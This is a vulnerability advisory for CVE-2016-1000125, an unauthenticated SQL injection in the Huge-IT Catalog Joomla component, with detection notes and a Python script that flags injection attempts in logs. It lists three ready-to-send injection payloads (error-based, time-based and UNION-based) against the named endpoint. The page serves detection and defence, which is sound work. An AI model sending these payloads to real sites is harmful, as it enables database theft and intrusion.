CVE-2016-1000125
published 2016-10-06

CVE-2016-1000125: Unauthenticated SQL Injection in Huge-IT Catalog v1.0.7 for Joomla

Priority: P262, critical, 9.8 (CVSS 3.0)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 2.50% (82.7th percentile)
Unauthenticated SQL Injection in Huge-IT Catalog v1.0.7 for Joomla

Affected

1 range

Vendor | Product | Version range | Fixed in
huge-it | huge-it_catalog | |

Detection & IOCs (extracted from sources)

url: http://example.com/components/com_catalog/ajax_url.php
path: /components/com_catalog/ajax_url.php
command: prod_page=1&post=load_more_elements_into_catalog&catalog_id=-2369 OR 1 GROUP BY CONCAT(0x717a627871,(SELECT (CASE WHEN (1973=1973) THEN 1 ELSE 0 END)),0x716b787671,FLOOR(RAND(0)*2)) HAVING MIN(0)#&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink=
command: prod_page=1&post=load_more_elements_into_catalog&catalog_id=(CASE WHEN (7371=7371) THEN SLEEP(5) ELSE 7371 END)&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink=
command: prod_page=1&post=load_more_elements_into_catalog&catalog_id=-5943 UNION ALL SELECT 2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,CONCAT(0x717a627871,0x494a475477424c724f6f7853556d61597544576f4b614d6e41596771595253476c4251797a685974,0x716b787671)-- FvOy&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink=
filename: ajax_url.php
  • Monitor POST requests to /components/com_catalog/ajax_url.php with the parameter post=load_more_elements_into_catalog; the catalog_id parameter is unsanitized and directly concatenated into SQL queries, making it the primary injection point.
  • Detect error-based SQL injection attempts by looking for FLOOR(RAND(0)*2) and GROUP BY CONCAT patterns in POST body targeting catalog_id.
  • Detect time-based blind SQL injection by alerting on SLEEP() calls within the catalog_id POST parameter to ajax_url.php.
  • Detect UNION-based SQL injection by looking for UNION ALL SELECT with 15 columns in POST body to ajax_url.php.
  • High volume of HTTP 500 responses from ajax_url.php during a short window is a strong indicator of active SQL injection probing against this component.
  • The vulnerability is unauthenticated — no session or login is required. Any POST to ajax_url.php with post=load_more_elements_into_catalog from an unauthenticated source should be treated as suspicious.
  • The vulnerable endpoint ajax_url.php is directly accessible under /components/com_catalog/ without any authentication check, meaning no Joomla session token or user privilege is enforced before reaching the injectable code path.
  • The injection affects multiple POST parameters beyond catalog_id (old_count, count_into_page, show_thumbs, show_description, parmalink), all of which are passed unsanitized; detection rules should cover all these parameters.
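
The detection notes above, combined into one log-side check. This is an added example, not code from the advisory or the vendor: it URL-decodes the POST body and tests every listed parameter against the three technique signatures, and separately flags a burst of HTTP 500s. The names classify and burst_of_500s, the 60-second window, the threshold of 5 and the sample bodies are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl

ENDPOINT = "/components/com_catalog/ajax_url.php"
ACTION = "load_more_elements_into_catalog"
# Parameters the page lists as passed unsanitized.
PARAMS = ("catalog_id", "old_count", "count_into_page",
          "show_thumbs", "show_description", "parmalink")
# One signature per technique named in the detection notes.
SIGNATURES = {
    "error-based": re.compile(r"GROUP\s+BY\s+CONCAT|FLOOR\s*\(\s*RAND\s*\(", re.I),
    "time-based": re.compile(r"\bSLEEP\s*\(", re.I),
    "union-based": re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I),
}

def classify(path, body):
    """Return {param: [technique, ...]} for one POST to the vulnerable endpoint."""
    if not path.split("?", 1)[0].endswith(ENDPOINT):
        return {}
    # parse_qsl percent-decodes values, so encoded payloads are matched too.
    fields = dict(parse_qsl(body, keep_blank_values=True))
    if fields.get("post") != ACTION:
        return {}
    hits = {}
    for name in PARAMS:
        value = fields.get(name, "")
        found = [t for t, rx in SIGNATURES.items() if rx.search(value)]
        if found:
            hits[name] = found
    return hits

def burst_of_500s(events, window=60, threshold=5):
    """True if `threshold` HTTP 500s fall within `window` seconds (assumed limits)."""
    times = sorted(ts for ts, status in events if status == 500)
    return any(times[i + threshold - 1] - times[i] <= window
               for i in range(len(times) - threshold + 1))

# Constructed sample POST bodies (not captured traffic).
SAMPLES = [
    "prod_page=1&post=load_more_elements_into_catalog&catalog_id=7&old_count=0",
    "prod_page=1&post=load_more_elements_into_catalog&catalog_id=SLEEP%285%29",
    "prod_page=1&post=load_more_elements_into_catalog&catalog_id=7&parmalink=x+UNION+ALL+SELECT+1",
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(classify(ENDPOINT, body) or "clean")
```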

CVSS provenance

Source | Version | Score | Severity | Vector
nvd | v3.0 | 9.8 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P